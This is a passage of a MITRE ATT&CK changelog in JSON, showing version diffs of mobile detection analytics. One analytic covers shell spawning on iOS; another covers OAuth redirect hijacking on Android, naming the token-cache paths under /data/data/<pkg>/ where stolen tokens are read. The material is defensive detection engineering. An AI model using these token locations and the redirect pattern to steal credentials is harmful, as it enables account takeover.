nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rameters,&nbsp;potentially&nbsp;detecting&nbsp;unwanted&nbsp;or&nbsp;malicious&nbsp;shells</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--77c81bf1-beef-429a-a426-a716b489383a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 20:37:17.277000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0655#AN1742",
                            "external_id": "AN1742"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1742",
                    "description": "The defender correlates managed-app runtime behavior indicative of command or shell invocation with subsequent spawned process or shell-like execution effects, then raises confidence when the resulting activity produces local artifacts or network communication outside expected user context. Because direct shell-process visibility can be weaker on iOS in many enterprise deployments, the analytic anchors first on process-creation or lower-level OS API effects where mobile telemetry can observe them, then on lifecycle context and post-execution network or file behavior. Confidence is strongest when the same app shows command invocation followed by process execution and immediate follow-on effects.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between command-execution indication, process effects, and follow-on file or network behavior"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Managed apps legitimately expected to perform debugging, remote support, or enterprise automation tasks"
                        },
                        {
                            "field": "AllowedProcessPatterns",
                            "description": "Expected process-launch or helper-execution patterns for approved managed apps"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether command-execution behavior should occur only during active user-driven workflows"
                        },
                        {
                            "field": "ArtifactPathPatterns",
                            "description": "Expected temporary or output file locations for approved app behavior"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound volume after command execution to treat network behavior as meaningful"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between command-execution indication, process effects, and follow-on file or network behavior\"}, {\"field\": \"AllowedAppList\", \"description\": \"Managed apps legitimately expected to perform debugging, remote support, or enterprise automation tasks\"}, {\"field\": \"AllowedProcessPatterns\", \"description\": \"Expected process-launch or helper-execution patterns for approved managed apps\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether command-execution behavior should occur only during active user-driven workflows\"}, {\"field\": \"ArtifactPathPatterns\", \"description\": \"Expected temporary or output file locations for approved app behavior\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound volume after command execution to treat network behavior as meaningful\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 20:37:17.277000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates managed-app runtime behavior indicative of command or shell invocation with subsequent spawned process or shell-like execution effects, then raises confidence when the resulting activity produces local artifacts or network communication outside expected user context. Because direct shell-process visibility can be weaker on iOS in many enterprise deployments, the analytic anchors first on process-creation or lower-level OS API effects where mobile telemetry can observe them, then on lifecycle context and post-execution network or file behavior. Confidence is strongest when the same app shows command invocation followed by process execution and immediate follow-on effects.\", \"old_value\": \"Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\\nMobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to newly created processes and their parameters, potentially detecting unwanted or malicious shells.\\nApplication vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)\\nMobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to running processes and their parameters, potentially detecting unwanted or malicious shells.\", \"diff\": \"--- \\n+++ \\n@@ -1,4 +1 @@\\n-Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\\n-Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to newly created processes and their parameters, potentially detecting unwanted or malicious shells.\\n-Application vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)\\n-Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to running processes and their parameters, potentially detecting unwanted or malicious shells.\\n+The defender correlates managed-app runtime behavior indicative of command or shell invocation with subsequent spawned process or shell-like execution effects, then raises confidence when the resulting activity produces local artifacts or network communication outside expected user context. Because direct shell-process visibility can be weaker on iOS in many enterprise deployments, the analytic anchors first on process-creation or lower-level OS API effects where mobile telemetry can observe them, then on lifecycle context and post-execution network or file behavior. Confidence is strongest when the same app shows command invocation followed by process execution and immediate follow-on effects.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0\", \"name\": \"Command\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"Process\", \"channel\": \"None\"}}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Samsung Knox Mobile Threat Defense\", \"description\": \"Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.\", \"url\": \"https://partner.samsungknox.com/mtd\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1\", \"name\": \"Process\", \"channel\": \"None\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to140__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to140__0\"><a href=\"#difflib_chg_to140__top\">t</a></td><td class=\"diff_header\" id=\"from140_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Command-line&nbsp;activities&nbsp;can&nbsp;potentially&nbsp;be&nbsp;detected&nbsp;through&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to140__top\">t</a></td><td class=\"diff_header\" id=\"to140_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;managed-app&nbsp;runtime&nbsp;behavior&nbsp;indicat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;Threat&nbsp;Defense&nbsp;(MTD)&nbsp;integrations&nbsp;with&nbsp;lower-level&nbsp;OS</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ive&nbsp;of&nbsp;command&nbsp;or&nbsp;shell&nbsp;invocation&nbsp;with&nbsp;subsequent&nbsp;spawned&nbsp;p</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;APIs.&nbsp;This&nbsp;could&nbsp;grant&nbsp;the&nbsp;MTD&nbsp;agents&nbsp;access&nbsp;to&nbsp;running&nbsp;pro</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rocess&nbsp;or&nbsp;shell-like&nbsp;execution&nbsp;effects,&nbsp;then&nbsp;raises&nbsp;confiden</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">cesses&nbsp;and&nbsp;their&nbsp;parameters,&nbsp;potentially&nbsp;detecting&nbsp;unwanted&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ce&nbsp;when&nbsp;the&nbsp;resulting&nbsp;activity&nbsp;produces&nbsp;local&nbsp;artifacts&nbsp;or&nbsp;n</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">or&nbsp;malicious&nbsp;shells.&nbsp;Mobile&nbsp;Threat&nbsp;Defense&nbsp;(MTD)&nbsp;with&nbsp;lower-</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">etwork&nbsp;communication&nbsp;outside&nbsp;expected&nbsp;user&nbsp;context.&nbsp;Because&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">level&nbsp;OS&nbsp;APIs&nbsp;integrations&nbsp;may&nbsp;have&nbsp;access&nbsp;to&nbsp;newly&nbsp;created&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">direct&nbsp;shell-process&nbsp;visibility&nbsp;can&nbsp;be&nbsp;weaker&nbsp;on&nbsp;iOS&nbsp;in&nbsp;many</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">processes&nbsp;and&nbsp;their&nbsp;parameters,&nbsp;potentially&nbsp;detecting&nbsp;unwant</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;enterprise&nbsp;deployments,&nbsp;the&nbsp;analytic&nbsp;anchors&nbsp;first&nbsp;on&nbsp;proce</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ed&nbsp;or&nbsp;malicious&nbsp;shells.&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;d</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ss-creation&nbsp;or&nbsp;lower-level&nbsp;OS&nbsp;API&nbsp;effects&nbsp;where&nbsp;mobile&nbsp;telem</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">etect&nbsp;the&nbsp;invocations&nbsp;of&nbsp;methods&nbsp;that&nbsp;could&nbsp;be&nbsp;used&nbsp;to&nbsp;execu</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">etry&nbsp;can&nbsp;observe&nbsp;them,&nbsp;then&nbsp;on&nbsp;lifecycle&nbsp;context&nbsp;and&nbsp;post-ex</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">te&nbsp;shell&nbsp;commands.(Citation:&nbsp;Samsung&nbsp;Knox&nbsp;Mobile&nbsp;Threat&nbsp;Defe</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ecution&nbsp;network&nbsp;or&nbsp;file&nbsp;behavior.&nbsp;Confidence&nbsp;is&nbsp;strongest&nbsp;wh</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nse)&nbsp;Mobile&nbsp;Threat&nbsp;Defense&nbsp;(MTD)&nbsp;with&nbsp;lower-level&nbsp;OS&nbsp;APIs&nbsp;in</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">en&nbsp;the&nbsp;same&nbsp;app&nbsp;shows&nbsp;command&nbsp;invocation&nbsp;followed&nbsp;by&nbsp;process</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tegrations&nbsp;may&nbsp;have&nbsp;access&nbsp;to&nbsp;running&nbsp;processes&nbsp;and&nbsp;their&nbsp;pa</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;execution&nbsp;and&nbsp;immediate&nbsp;follow-on&nbsp;effects.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rameters,&nbsp;potentially&nbsp;detecting&nbsp;unwanted&nbsp;or&nbsp;malicious&nbsp;shells</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--9253e546-bc55-42c1-bf8c-b4337a1ea5b5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-02 17:41:17.052000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0656#AN1743",
                            "external_id": "AN1743"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1743",
                    "description": "Defender observes an OAuth/OIDC redirect (ACTION_VIEW) resolved to a non-allowlisted handler package (logcat:IntentResolver), followed within a short window by that same package accessing token material via AccountManager/Keystore or reading application token caches under /data/data/<pkg>/(shared_prefs|databases) (logcat:AccountManager, logcat:Keystore, logcat:FileIO). Correlate on package/UID/profile and time proximity to indicate token acquisition.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "ACTION_VIEW redirect_uri handled by unexpected package"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "android:logcat",
                            "channel": "Task switch from browser/custom tab to handler immediately after OAuth return"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
                            "name": "android:logcat",
                            "channel": "KeyChain/AndroidKeyStore read of token alias"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max seconds between redirect handling and token access (e.g., 30\u2013180)."
                        },
                        {
                            "field": "RedirectUriAllowlist",
                            "description": "Approved redirect URI patterns per app (HTTPS/app-scheme)."
                        },
                        {
                            "field": "TrustedHandlerPackages",
                            "description": "Expected package names allowed to handle the redirect."
                        },
                        {
                            "field": "TokenFileRegex",
                            "description": "Environment-specific token cache filenames/paths."
                        },
                        {
                            "field": "WorkProfileScope",
                            "description": "Restrict to enterprise work profile to reduce personal-app noise."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max seconds between redirect handling and token access (e.g., 30\\u2013180).\"}, {\"field\": \"RedirectUriAllowlist\", \"description\": \"Approved redirect URI patterns per app (HTTPS/app-scheme).\"}, {\"field\": \"TrustedHandlerPackages\", \"description\": \"Expected package names allowed to handle the redirect.\"}, {\"field\": \"TokenFileRegex\", \"description\": \"Environment-specific token cache filenames/paths.\"}, {\"field\": \"WorkProfileScope\", \"description\": \"Restrict to enterprise work profile to reduce personal-app noise.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-02 17:41:17.052000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes an OAuth/OIDC redirect (ACTION_VIEW) resolved to a non-allowlisted handler package (logcat:IntentResolver), followed within a short window by that same package accessing token material via AccountManager/Keystore or reading application token caches under /data/data/<pkg>/(shared_prefs|databases) (logcat:AccountManager, logcat:Keystore, logcat:FileIO). Correlate on package/UID/profile and time proximity to indicate token acquisition.\", \"old_value\": \"When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)\\nOn Android, users may be presented with a popup to select the appropriate application to open a URI in. If the user sees an application they do not recognize, they can remove it.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)\\n-On Android, users may be presented with a popup to select the appropriate application to open a URI in. If the user sees an application they do not recognize, they can remove it.\\n+Defender observes an OAuth/OIDC redirect (ACTION_VIEW) resolved to a non-allowlisted handler package (logcat:IntentResolver), followed within a short window by that same package accessing token material via AccountManager/Keystore or reading application token caches under /data/data/<pkg>/(shared_prefs|databases) (logcat:AccountManager, logcat:Keystore, logcat:FileIO). Correlate on package/UID/profile and time proximity to indicate token acquisition.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"ACTION_VIEW redirect_uri handled by unexpected package\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"android:logcat\", \"channel\": \"Task switch from browser/custom tab to handler immediately after OAuth return\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71\", \"name\": \"android:logcat\", \"channel\": \"KeyChain/AndroidKeyStore read of token alias\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Android-AppLinks\", \"description\": \"Android. (n.d.). Handling App Links. Retrieved December 21, 2016.\", \"url\": \"https://developer.android.com/training/app-links/index.html\"}, \"root['external_references'][2]\": {\"source_name\": \"IETF-OAuthNativeApps\", \"description\": \"W. Denniss and J. Bradley. (2017, October). IETF RFC 8252: OAuth 2.0 for Native Apps. Retrieved November 30, 2018.\", \"url\": \"https://tools.ietf.org/html/rfc8252\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to133__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to133__0\"><a href=\"#difflib_chg_to133__top\">t</a></td><td class=\"diff_header\" id=\"from133_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">When&nbsp;vetting&nbsp;applications&nbsp;for&nbsp;potential&nbsp;security&nbsp;weaknesses,</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to133__top\">t</a></td><td class=\"diff_header\" id=\"to133_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;an&nbsp;OAuth/OIDC&nbsp;redirect&nbsp;(ACTION_VIEW)&nbsp;resol</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;the&nbsp;vetting&nbsp;process&nbsp;could&nbsp;look&nbsp;for&nbsp;insecure&nbsp;use&nbsp;of&nbsp;Intents.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ved&nbsp;to&nbsp;a&nbsp;non-allowlisted&nbsp;handler&nbsp;package&nbsp;(logcat:IntentResol</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;Developers&nbsp;should&nbsp;be&nbsp;encouraged&nbsp;to&nbsp;use&nbsp;techniques&nbsp;to&nbsp;ensure</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ver),&nbsp;followed&nbsp;within&nbsp;a&nbsp;short&nbsp;window&nbsp;by&nbsp;that&nbsp;same&nbsp;package&nbsp;ac</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;that&nbsp;the&nbsp;intent&nbsp;can&nbsp;only&nbsp;be&nbsp;sent&nbsp;to&nbsp;an&nbsp;appropriate&nbsp;destinat</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cessing&nbsp;token&nbsp;material&nbsp;via&nbsp;AccountManager/Keystore&nbsp;or&nbsp;readin</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ion&nbsp;(e.g.,&nbsp;use&nbsp;explicit&nbsp;rather&nbsp;than&nbsp;implicit&nbsp;intents,&nbsp;permis</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">g&nbsp;application&nbsp;token&nbsp;caches&nbsp;under&nbsp;/data/data/&lt;pkg&gt;/(shared_pr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">sion&nbsp;checking,&nbsp;checking&nbsp;of&nbsp;the&nbsp;destination&nbsp;app's&nbsp;signing&nbsp;cer</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">efs|databases)&nbsp;(logcat:AccountManager,&nbsp;logcat:Keystore,&nbsp;logc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tificate,&nbsp;or&nbsp;utilizing&nbsp;the&nbsp;App&nbsp;Links&nbsp;feature).&nbsp;For&nbsp;mobile&nbsp;ap</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">at:FileIO).&nbsp;Correlate&nbsp;on&nbsp;package/UID/profile&nbsp;and&nbsp;time&nbsp;proxim</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">plications&nbsp;using&nbsp;OAuth,&nbsp;encourage&nbsp;use&nbsp;of&nbsp;best&nbsp;practice.(Cita</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ity&nbsp;to&nbsp;indicate&nbsp;token&nbsp;acquisition.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tion:&nbsp;IETF-OAuthNativeApps)(Citation:&nbsp;Android-AppLinks)&nbsp;On&nbsp;A</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ndroid,&nbsp;users&nbsp;may&nbsp;be&nbsp;presented&nbsp;with&nbsp;a&nbsp;popup&nbsp;to&nbsp;select&nbsp;the&nbsp;ap</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">propriate&nbsp;application&nbsp;to&nbsp;open&nbsp;a&nbsp;URI&nbsp;in.&nbsp;If&nbsp;the&nbsp;user&nbsp;sees&nbsp;an&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">application&nbsp;they&nbsp;do&nbsp;not&nbsp;recognize,&nbsp;they&nbsp;can&nbsp;remove&nbsp;it.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--085c9205-d55a-4e33-a5df-241e505be32f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-06 15:07:15.622000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0658#AN1747",
                            "external_id": "AN1747"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1747",
